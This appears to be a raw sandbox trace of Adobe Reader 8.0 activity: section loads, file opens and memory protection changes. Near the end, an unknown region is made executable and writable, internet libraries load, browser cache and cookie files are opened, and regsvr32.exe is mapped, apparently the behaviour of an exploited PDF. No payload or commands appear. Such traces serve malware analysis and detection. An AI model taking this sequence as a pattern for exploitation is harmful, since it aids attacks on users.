Section loaded Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 1B30000 Size: 507904 Protection: execute Mapped to pid: own pid success or wait 2512226845
Section loaded Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: 1B30000 Size: 507904 Protection: execute Mapped to pid: own pid object name not found 2512273896
Section loaded Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 1B30000 Size: 2904064 Protection: read write Mapped to pid: own pid conflicting addresses 2512275719
Section loaded Path: \KnownDlls\Accessibility.api Access: write and read and execute Type: unknown Baseaddress: 1B30000 Size: 2904064 Protection: read write Mapped to pid: own pid object name not found 2512385206
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Accessibility.api Access: query and write and read and execute Type: image Baseaddress: 29800000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 2512392004
Section loaded Path: \KnownDlls\AcroForm.api Access: write and read and execute Type: unknown Baseaddress: 29800000 Size: 372736 Protection: read write Mapped to pid: own pid object name not found 2512741330
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\AcroForm.api Access: query and write and read and execute Type: image Baseaddress: 20800000 Size: 9744384 Protection: read write Mapped to pid: own pid success or wait 2512752040
Section loaded Path: \KnownDlls\USP10.dll Access: write and read and execute Type: unknown Baseaddress: 20800000 Size: 9744384 Protection: read write Mapped to pid: own pid object name not found 2512857250
Section loaded Path: C:\WINDOWS\system32\usp10.dll Access: query and write and read and execute Type: image Baseaddress: 74D90000 Size: 438272 Protection: read write Mapped to pid: own pid success or wait 2512859925
Section loaded Path: \KnownDlls\Annots.api Access: write and read and execute Type: unknown Baseaddress: 74D90000 Size: 438272 Protection: read write Mapped to pid: own pid object name not found 2513109076
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Annots.api Access: query and write and read and execute Type: image Baseaddress: 22100000 Size: 4165632 Protection: read write Mapped to pid: own pid success or wait 2513114381
Section loaded Path: \KnownDlls\Checkers.api Access: write and read and execute Type: unknown Baseaddress: 22100000 Size: 4165632 Protection: read write Mapped to pid: own pid object name not found 2513431625
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Checkers.api Access: query and write and read and execute Type: image Baseaddress: 45800000 Size: 851968 Protection: read write Mapped to pid: own pid success or wait 2513436999
Section loaded Path: \KnownDlls\DigSig.api Access: write and read and execute Type: unknown Baseaddress: 45800000 Size: 851968 Protection: read write Mapped to pid: own pid object name not found 2513532211
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DigSig.api Access: query and write and read and execute Type: image Baseaddress: 23000000 Size: 1167360 Protection: read write Mapped to pid: own pid success or wait 2513536971
Section loaded Path: \KnownDlls\DVA.api Access: write and read and execute Type: unknown Baseaddress: 23000000 Size: 1167360 Protection: read write Mapped to pid: own pid object name not found 2513660777
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\DVA.api Access: query and write and read and execute Type: image Baseaddress: 40800000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2513664297
Section loaded Path: \KnownDlls\eBook.api Access: write and read and execute Type: unknown Baseaddress: 40800000 Size: 139264 Protection: read write Mapped to pid: own pid object name not found 2513750493
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\eBook.api Access: query and write and read and execute Type: image Baseaddress: 26800000 Size: 65536 Protection: read write Mapped to pid: own pid success or wait 2513753982
Section loaded Path: \KnownDlls\EScript.api Access: write and read and execute Type: unknown Baseaddress: 26800000 Size: 65536 Protection: read write Mapped to pid: own pid object name not found 2513803157
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EScript.api Access: query and write and read and execute Type: image Baseaddress: 23800000 Size: 1437696 Protection: read write Mapped to pid: own pid success or wait 2513807947
Section loaded Path: \KnownDlls\EWH32.api Access: write and read and execute Type: unknown Baseaddress: 23800000 Size: 1437696 Protection: read write Mapped to pid: own pid object name not found 2513931523
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\EWH32.api Access: query and write and read and execute Type: image Baseaddress: 24000000 Size: 147456 Protection: read write Mapped to pid: own pid success or wait 2513935117
Section loaded Path: \KnownDlls\HLS.api Access: write and read and execute Type: unknown Baseaddress: 24000000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2513986845
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\HLS.api Access: query and write and read and execute Type: image Baseaddress: 31800000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2513990311
Section loaded Path: \KnownDlls\IA32.api Access: write and read and execute Type: unknown Baseaddress: 31800000 Size: 69632 Protection: read write Mapped to pid: own pid object name not found 2514031568
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\IA32.api Access: query and write and read and execute Type: image Baseaddress: 25800000 Size: 98304 Protection: read write Mapped to pid: own pid success or wait 2514035054
Section loaded Path: \KnownDlls\ImageViewer.API Access: write and read and execute Type: unknown Baseaddress: 25800000 Size: 98304 Protection: read write Mapped to pid: own pid object name not found 2514076451
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ImageViewer.API Access: query and write and read and execute Type: image Baseaddress: 46800000 Size: 475136 Protection: read write Mapped to pid: own pid success or wait 2514081157
Section loaded Path: \KnownDlls\MakeAccessible.api Access: write and read and execute Type: unknown Baseaddress: 46800000 Size: 475136 Protection: read write Mapped to pid: own pid object name not found 2514195877
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\MakeAccessible.api Access: query and write and read and execute Type: image Baseaddress: 29000000 Size: 2273280 Protection: read write Mapped to pid: own pid success or wait 2514200663
Section loaded Path: \KnownDlls\Multimedia.api Access: write and read and execute Type: unknown Baseaddress: 29000000 Size: 2273280 Protection: read write Mapped to pid: own pid object name not found 2514302790
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: query and write and read and execute Type: image Baseaddress: 2D800000 Size: 1372160 Protection: read write Mapped to pid: own pid success or wait 2514307574
Section loaded Path: \KnownDlls\PDDom.api Access: write and read and execute Type: unknown Baseaddress: 2D800000 Size: 1372160 Protection: read write Mapped to pid: own pid object name not found 2514455902
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: query and write and read and execute Type: image Baseaddress: 2B800000 Size: 417792 Protection: read write Mapped to pid: own pid success or wait 2514459393
Section loaded Path: \KnownDlls\PPKLite.api Access: write and read and execute Type: unknown Baseaddress: 2B800000 Size: 417792 Protection: read write Mapped to pid: own pid object name not found 2514513279
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: query and write and read and execute Type: image Baseaddress: 28000000 Size: 5795840 Protection: read write Mapped to pid: own pid success or wait 2514517071
Section loaded Path: \KnownDlls\ReadOutLoud.api Access: write and read and execute Type: unknown Baseaddress: 28000000 Size: 5795840 Protection: read write Mapped to pid: own pid object name not found 2514813698
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: query and write and read and execute Type: image Baseaddress: 29A00000 Size: 122880 Protection: read write Mapped to pid: own pid success or wait 2514817231
Section loaded Path: \KnownDlls\reflow.api Access: write and read and execute Type: unknown Baseaddress: 29A00000 Size: 122880 Protection: read write Mapped to pid: own pid object name not found 2514868047
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: query and write and read and execute Type: image Baseaddress: 28800000 Size: 385024 Protection: read write Mapped to pid: own pid success or wait 2514871951
Section loaded Path: \KnownDlls\SaveAsRTF.api Access: write and read and execute Type: unknown Baseaddress: 28800000 Size: 385024 Protection: read write Mapped to pid: own pid object name not found 2514986405
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: query and write and read and execute Type: image Baseaddress: 32000000 Size: 319488 Protection: read write Mapped to pid: own pid success or wait 2514996821
Section loaded Path: \KnownDlls\Search.api Access: write and read and execute Type: unknown Baseaddress: 32000000 Size: 319488 Protection: read write Mapped to pid: own pid object name not found 2515052245
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: query and write and read and execute Type: image Baseaddress: 2A300000 Size: 372736 Protection: read write Mapped to pid: own pid success or wait 2515057239
Section loaded Path: \KnownDlls\Search5.api Access: write and read and execute Type: unknown Baseaddress: 2A300000 Size: 372736 Protection: read write Mapped to pid: own pid object name not found 2515128647
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: query and write and read and execute Type: image Baseaddress: 2A000000 Size: 102400 Protection: read write Mapped to pid: own pid success or wait 2515132102
Section loaded Path: \KnownDlls\SendMail.api Access: write and read and execute Type: unknown Baseaddress: 2A000000 Size: 102400 Protection: read write Mapped to pid: own pid object name not found 2515173078
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: query and write and read and execute Type: image Baseaddress: 2A800000 Size: 139264 Protection: read write Mapped to pid: own pid success or wait 2515176562
Section loaded Path: \KnownDlls\Spelling.api Access: write and read and execute Type: unknown Baseaddress: 2A800000 Size: 139264 Protection: read write Mapped to pid: own pid object name not found 2515227935
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: query and write and read and execute Type: image Baseaddress: 2B000000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2515233032
Section loaded Path: \KnownDlls\Updater.api Access: write and read and execute Type: unknown Baseaddress: 2B000000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2515284328
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: query and write and read and execute Type: image Baseaddress: 30800000 Size: 188416 Protection: read write Mapped to pid: own pid success or wait 2515288192
Section loaded Path: \KnownDlls\weblink.api Access: write and read and execute Type: unknown Baseaddress: 30800000 Size: 188416 Protection: read write Mapped to pid: own pid object name not found 2515340360
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: query and write and read and execute Type: image Baseaddress: 2E000000 Size: 196608 Protection: read write Mapped to pid: own pid success or wait 2515344302
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 2E000000 Size: 196608 Protection: read write Mapped to pid: own pid object name not found 2516418775
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2516420778
Section loaded Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid object name not found 2517191753
Section loaded Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid success or wait 2517193665
Section loaded Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid object name not found 2517205542
Section loaded Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid success or wait 2517207442
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: write and read and execute Type: commit Baseaddress: 2DD0000 Size: 237568 Protection: execute Mapped to pid: own pid success or wait 2531505119
Section loaded Path: C:\WINDOWS\system32\rasapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid success or wait 2531508638
Section loaded Path: \KnownDlls\rasman.dll Access: write and read and execute Type: unknown Baseaddress: 76EE0000 Size: 245760 Protection: read write Mapped to pid: own pid object name not found 2531514374
Section loaded Path: C:\WINDOWS\system32\rasman.dll Access: query and write and read and execute Type: image Baseaddress: 76E90000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2531516417
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 2531521340
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid object name not found 2531578780
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2531580531
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 2531586771
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2531588623
Section loaded Path: \KnownDlls\TAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2531594768
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: query and write and read and execute Type: image Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid success or wait 2531596427
Section loaded Path: \KnownDlls\rtutils.dll Access: write and read and execute Type: unknown Baseaddress: 76EB0000 Size: 192512 Protection: read write Mapped to pid: own pid object name not found 2531602933
Section loaded Path: C:\WINDOWS\system32\rtutils.dll Access: query and write and read and execute Type: image Baseaddress: 76E80000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 2531604655
Section loaded Path: C:\WINDOWS\system32\tapi32.dll Access: read Type: commit Baseaddress: 2DD0000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2531670107
Section loaded Path: \BaseNamedObjects\ASMWIN0 Access: query and write and read Type: commit Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2531836515
Section loaded Path: \BaseNamedObjects\ASMWIN1 Access: query and write and read Type: commit Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535740201
Section loaded Path: \BaseNamedObjects\ASMWIN2 Access: query and write and read Type: commit Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2539073786
Section loaded Path: \KnownDlls\AXE8SharedExpat.dll Access: write and read and execute Type: unknown Baseaddress: 2DD0000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 2542465211
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AXE8SharedExpat.dll Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2542468353
Section loaded Path: \KnownDlls\AXSLE.dll Access: write and read and execute Type: unknown Baseaddress: 10000000 Size: 184320 Protection: read write Mapped to pid: own pid object name not found 2542662189
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\AXSLE.dll Access: query and write and read and execute Type: image Baseaddress: 2E10000 Size: 618496 Protection: read write Mapped to pid: own pid conflicting addresses 2542666927
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: write and read and execute Type: commit Baseaddress: 2EC0000 Size: 245760 Protection: execute Mapped to pid: own pid success or wait 2544126580
Section loaded Path: C:\WINDOWS\system32\mswsock.dll Access: query and write and read and execute Type: image Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2544191995
Section loaded Path: \KnownDlls\DNSAPI.dll Access: write and read and execute Type: unknown Baseaddress: 71A50000 Size: 258048 Protection: read write Mapped to pid: own pid object name not found 2544208657
Section loaded Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid success or wait 2544210532
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: write and read and execute Type: commit Baseaddress: 2EC0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2544271473
Section loaded Path: C:\WINDOWS\system32\winrnr.dll Access: query and write and read and execute Type: image Baseaddress: 76FB0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2544284681
Section loaded Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: unknown Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid success or wait 2544290166
Section loaded Path: \KnownDlls\rasadhlp.dll Access: write and read and execute Type: unknown Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid object name not found 2544367456
Section loaded Path: C:\WINDOWS\system32\rasadhlp.dll Access: query and write and read and execute Type: image Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2544369250
Section loaded Path: \KnownDlls\ATMLIB.dll Access: write and read and execute Type: unknown Baseaddress: 76FC0000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2551326135
Section loaded Path: C:\WINDOWS\system32\atmlib.dll Access: query and write and read and execute Type: image Baseaddress: 73C20000 Size: 45056 Protection: read write Mapped to pid: own pid success or wait 2551459941
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2552058525
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552121407
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552134802
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552148951
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552177879
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 212992 Protection: readonly Mapped to pid: own pid success or wait 2552187931
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 253952 Protection: readonly Mapped to pid: own pid success or wait 2552197579
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-It.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 253952 Protection: readonly Mapped to pid: own pid success or wait 2552207623
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MinionPro-Regular.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 208896 Protection: readonly Mapped to pid: own pid success or wait 2552287131
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 98304 Protection: readonly Mapped to pid: own pid success or wait 2552297263
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 102400 Protection: readonly Mapped to pid: own pid success or wait 2552307240
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-It.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 102400 Protection: readonly Mapped to pid: own pid success or wait 2552317457
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 98304 Protection: readonly Mapped to pid: own pid success or wait 2552327445
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2552339383
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2561989353
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll Access: write and read and execute Type: commit Baseaddress: 2EF0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2562143807
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\icucnv34.dll Access: query and write and read and execute Type: image Baseaddress: 4A800000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2562206204
Section loaded Path: \KnownDlls\icudt34.dll Access: write and read and execute Type: unknown Baseaddress: 4A800000 Size: 299008 Protection: read write Mapped to pid: own pid object name not found 2562308962
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\icudt34.dll Access: query and write and read and execute Type: image Baseaddress: 4AD00000 Size: 90112 Protection: read write Mapped to pid: own pid success or wait 2562312532
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2562749060
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2562765658
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2562890526
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\SY______.PFB Access: query and read Type: commit Baseaddress: 2EE0000 Size: 36864 Protection: readonly Mapped to pid: own pid success or wait 2563496414
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 2F00000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2563579568
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Resource\Font\MyriadPro-Regular.otf Access: query and read Type: commit Baseaddress: 2F00000 Size: 98304 Protection: readonly Mapped to pid: own pid success or wait 2563718778
Section loaded Path: unknown Access: query and write and read and execute Type: commit Baseaddress: 2FC0000 Size: 4096 Protection: execute and read and write Mapped to pid: own pid success or wait 2630294410
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 2FC00AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2630362338
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 7E1E0000 Size: 663552 Protection: read write Mapped to pid: own pid success or wait 2630379343
Section loaded Path: C:\WINDOWS\system32\urlmon.dll Access: read Type: commit Baseaddress: 111B0000 Size: 622592 Protection: readonly Mapped to pid: own pid success or wait 2630477257
Section loaded Path: \KnownDlls\mlang.dll Access: write and read and execute Type: unknown Baseaddress: 111B0000 Size: 622592 Protection: readonly Mapped to pid: own pid object name not found 2630709254
Section loaded Path: C:\WINDOWS\system32\mlang.dll Access: query and write and read and execute Type: image Baseaddress: 75CF0000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2630713598
Section loaded Path: C:\WINDOWS\system32\mlang.dll Access: read Type: commit Baseaddress: 111B0000 Size: 589824 Protection: readonly Mapped to pid: own pid success or wait 2630754558
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 771B0000 Size: 696320 Protection: read write Mapped to pid: own pid success or wait 2630805363
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2630809953
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2630818639
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: read Type: commit Baseaddress: 111B0000 Size: 667648 Protection: readonly Mapped to pid: own pid success or wait 2630876569
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631052844
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631063270
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_Temporary Internet Files_Content.IE5_index.dat_147456 Access: write Type: unknown Baseaddress: 4F90000 Size: 147456 Protection: read write Mapped to pid: own pid success or wait 2631064451
File opened Path: C:\Documents and Settings\Administrator\Cookies\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631074983
File opened Path: C:\Documents and Settings\Administrator\Cookies\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631085621
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Cookies_index.dat_32768 Access: write Type: unknown Baseaddress: 4FC0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2631086717
File opened Path: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631101333
File opened Path: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2631117181
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_index.dat_32768 Access: write Type: unknown Baseaddress: 4FD0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2631118360
Section loaded Path: \KnownDlls\wsock32.dll Access: write and read and execute Type: unknown Baseaddress: 4FD0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2631354894
Section loaded Path: C:\WINDOWS\system32\wsock32.dll Access: query and write and read and execute Type: image Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2631360508
Section loaded Path: \KnownDlls\hnetcfg.dll Access: write and read and execute Type: unknown Baseaddress: 71AD0000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2631622917
Section loaded Path: C:\WINDOWS\system32\hnetcfg.dll Access: query and write and read and execute Type: image Baseaddress: 662B0000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2631624698
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: write and read and execute Type: commit Baseaddress: 4FE0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2631759497
Section loaded Path: C:\WINDOWS\system32\wshtcpip.dll Access: query and write and read and execute Type: image Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2631765359
Section loaded Path: \KnownDlls\sensapi.dll Access: write and read and execute Type: unknown Baseaddress: 71A90000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2632015715
Section loaded Path: C:\WINDOWS\system32\sensapi.dll Access: query and write and read and execute Type: image Baseaddress: 722B0000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2632044986
Section loaded Path: \BaseNamedObjects\SENS Information Cache Access: read Type: unknown Baseaddress: 4FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2632133038
Section loaded Path: \BaseNamedObjects\UrlZonesSM_Administrator Access: query and write and read Type: commit Baseaddress: 4FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid object name exists 2632510755
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\J5ROTG8O\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2638860957
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\J5ROTG8O\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2638862308
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 4FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2638931525
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 115B0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2638941851
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2638976182
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2638983425
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2638988190
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2638990566
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2639103722
